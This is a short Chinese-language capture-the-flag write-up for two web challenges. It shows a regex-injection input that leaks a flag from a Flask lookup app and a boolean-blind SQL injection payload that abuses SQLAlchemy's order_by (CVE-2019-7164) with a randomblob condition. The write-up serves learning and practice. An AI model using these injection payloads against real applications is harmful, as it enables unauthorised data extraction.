这是两道题目的 WP 合集,由于我只打了这两道题,所以就不分开写了(丢人)
Personnel
app.py
#!/usr/bin/env python from flask import Flask, Response, abort, request, render_template import random from string import * import re app = Flask(__name__) flag = open("flag.txt").read() users = open("users.txt").read() users += flag @app.route("/", methods=["GET", "POST"]) def index(): if request.method == "GET": return render_template("lookup.html") if request.method == "POST": name = request.form["name"] setting = int(request.form["setting"]) if name: if name[0].isupper(): name = name[1:] results = re.findall(r"[A-Z][a-z]*?" + name + r"[a-z]*?\n", users, setting) results = [x.strip() for x in results if x or len(x) > 1] return render_template("lookup.html", passed_results=True, results=results) if __name__ == "__main__": app.run()
users.txt
miku viewofthai
flag.txt
flag{xxxxxxxxxx}
审计下代码,只有一个注入点,name = request.form["name"]
于是运用 Regex101 构造正则表达式
\nflag{[^\s]*?[\}\
就出了(正则表达式的熟练运用题)
Flaskmetal Alchemist
这一题代码过长我就不放了,也许我会放个压缩包
题目压缩包 fma.zip
app.py
from sqlalchemy import text ···· metals = Metal.query.filter( Metal.name.like("%{}%".format(search)) ).order_by(text(order)) ····
主要有用的就这一些,sqlalchemy 出现过 order_by 漏洞
CVE-2019-7164
Sqlalchemy-Github-issues
有什么好说的,直接开注!
在测试中,无法报错注入,于是只能 bool 盲注
exp
from flask import Flask, render_template, request, url_for, redirect from models import Metal from database import db_session, init_db from seed import seed_db from sqlalchemy import text seed_db() search = "Lu" order = f" case when 1=1 then 0 else randomblob(100000000000000) end " metals = Metal.query.filter(Metal.name.like("% {}%".format(search))).order_by(text(order)) print(metals) for item in metals: print(item.name)
然后爆就完了(不想自己写,抢 miku 的 wp 来用了~)
